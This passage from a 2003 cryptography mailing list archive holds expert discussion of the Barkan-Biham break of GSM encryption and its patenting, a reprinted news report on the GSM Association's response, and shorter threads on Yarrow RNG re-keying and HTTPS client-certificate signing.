>problem, and the method is being patented so that in future it can be used
>by the law enforcement agencies.
"Laughing my ass off."  Since when do governments care about patents?
How would this help/harm them from exploiting it?   Not that
high-end LEOs haven't already had this capacity ---Biham et al
are only the first *open* researchers to reveal this.
Actually, patenting the method isn't nearly as silly as it sounds. Produced 
in quantity, a device to break GSM using this attack is not going to cost 
much more than a cellphone (without subsidies). Patenting the attack 
prevents the production of the "radio shack (tm) gsm scanner", so that it 
at least requires serious attackers, not idle retirees or jealous teenagers.

Greg.

Greg Rose   INTERNET: [EMAIL PROTECTED]
Qualcomm Australia  VOICE:  +61-2-9817 4188   FAX: +61-2-9817 5199
Level 3, 230 Victoria Road,http://people.qualcomm.com/ggr/
Gladesville NSW 2111232B EC8F 44C6 C853 D68F  E107 E6BF CD2F 1081 A37C
-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

Re: Code breakers crack GSM cellphone encryption

[Anton Stiglic]

>- Original Message - 
>From: "John Doe Number Two" <[EMAIL PROTECTED]>
>To: "R. A. Hettinga" <[EMAIL PROTECTED]>; "Clippable"
<[EMAIL PROTECTED]>
>Cc: <[EMAIL PROTECTED]>
>Sent: Sunday, September 07, 2003 6:45 PM
>Subject: Re: Code breakers crack GSM cellphone encryption
>

>It's nice to see someone 'discovering' what Lucky Green already figured-out
>years ago.  I wonder if they'll cut him a check.

I think this is different however.  The recent attack focused on the A5/3
encryption algorithm, while the work of Lucky, Briceno, Goldberg, Wagner,
Biryukov, Shamir (and others?) was on A5/1 and A5/2 (and other crypto
algorithms of GSM, such as COMP128, ...).

--Anton



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

Re: cryptographic ergodic sequence generators?

[Anton Stiglic]

> [...]
> The Yarrow RNG uses counter-mode as a PRNG.  However in the paper they
> describe some effects you may want to avoid by re-keying depending on
> your application as the stream becomes distinguishable from random
> output.
>
> Adam

This is essentially because if your output sequence of n-bit blocks were
really random,
you would expect to see a collision between two n-bit blocks after seeing
about 2^(n/2)
block outputs (birthday paradox), but using a block cipher with a counter
gives you no
collision before 2^n block outputs.  This is indeed why in the Yarrow design
they
suggest to re-key after 2^(n/3) block outputs.

--Anton


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

Re: Is cryptography where security took the wrong branch?

[Ben Laurie]

Eric Rescorla wrote:

> Ben Laurie <[EMAIL PROTECTED]> writes:
> 
> 
>>Eric Rescorla wrote:
>>
>>>Incidentally, when designing SHTTP we envisioned that credit
>>>transactions would be done with signatures. I would say that
>>>the Netscape guys were right in believing that confidentiality
>>>for the CC number was good enough.
>>
>>I don't think so. One of the things I'm running into increasingly with
>>HTTPS is that you can't do an end-to-end check on a cert. That is, if I
>>have some guy logging into some site using a client cert, and that site
>>then makes a back-end connection to another site, there's no way it can
>>prove to the back-end site that it has the real guy online (without
>>playing nasty tricks with the guts of SSL, anyway), and there's
>>certainly no way to prove that some particular response came from him.
>>Signing stuff would deal with this trivially.
> 
> 
> Well, I'd certainly like to believe that this is true, since
> it would mean that Allan and I were right all along. :)

You _were_ right all along. At least about this :-)

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html   http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

GSM Association downplays mobile security concerns

[R. A. Hettinga]

š

GSM Association downplays mobile security concerns
By John Walko,  CommsDesign.com
Sep 3, 2003 (5:41 AM)
URL: http://www.commsdesign.com/story/OEG20030903S0013

LONDON ± The GSM Association is playing down concerns raised by a team of
Israeli scientists about the security of GSM mobile calls.

The researchers, from the Technion Institute of Technology in Haifa,
revealed they had discovered a basic flaw in the encryption system of the
GSM (Global System for Mobile)specification, allowing them to crack its
encoding system.

The GSM Association, which represents vendors who sell the world's largest
mobile system, confirmed the security hole but said it would be expensive
and complicated to exploit.

Eli Biham, a professor at the Technion Institute, said he was shocked when
doctoral student Elad Barkan told him he had found a fundamental error in
the GSM code, according to a Reuters report on Wednesday (Sept. 3). The
results of the research were presented at a recent international conference
on cryptology.

"We can listen in to a call while it is still at the ringing stage, and
within a fraction of a second know everything about the user," Biham told
the news agency. "Then we can listen in to the call."

"Using a special device it's possible to steal calls and impersonate
callers in the middle of a call as it's happening," he added. GSM code
writers made a mistake in giving high priority to call quality, correcting
for noise and interference and only then encrypting, Biham said.

The GSM Association said the security holes in the GSM system can be traced
to its development in the late 1980s when computing power was still
limited. It said the particular gap could only be exploited with complex
and expensive technology and that it would take a long time to target
individual callers.

"This [technique] goes further than previous academic papers, [but] it is
nothing new or surprising to the GSM community. The GSM Association
believes that the practical implications of the paper are limited," the
group said in a statement.

The association said an upgrade had been made available in July 2002 to
patch the vulnerability in the A5/2 encryption algorithm.

It said any attack would require the attacker to transmit distinctive data
over the air to masquerade as a GSM base station. An attacker would also
have to physically stand between the caller and the base station to
intercept the call.

The researchers claimed they also managed to overcome the new encryption
system put in place as a response to previous attacks.

Copyright ' 2003 CMP Media, LLC |Privacy Statement
-- 
-
R. A. Hettinga 
The Internet Bearer Underwriting Corporation 
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'

-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

RE: Code breakers crack GSM cellphone encryption

[Olle Mulmo]

DCMA comes to mind: it could potentially make it a little harder to get
your hands on any mass market eavesdropping tool.

If you are terribly concerned about this, there are end-to-end encryption
phones on the market that are used by military and others already today.
Such systems come with a price tag though: As for me, the ordinary end
user, I just have be as careful with what I say or trust when communicating
over the phone as when I'm using email.

But that should have already been the case, had I thought things through,
and shouldn't come as a shock.

/Olle

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of David Honig
Sent: den 8 september 2003 02:18
To: R. A. Hettinga; Clippable
Cc: [EMAIL PROTECTED]
Subject: Re: Code breakers crack GSM cellphone encryption

>A copy of the research was sent to GSM authorities in order to correct the
>problem, and the method is being patented so that in future it can be used
>by the law enforcement agencies.

"Laughing my ass off."  Since when do governments care about patents? 
How would this help/harm them from exploiting it?   Not that
high-end LEOs haven't already had this capacity ---Biham et al
are only the first *open* researchers to reveal this.



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]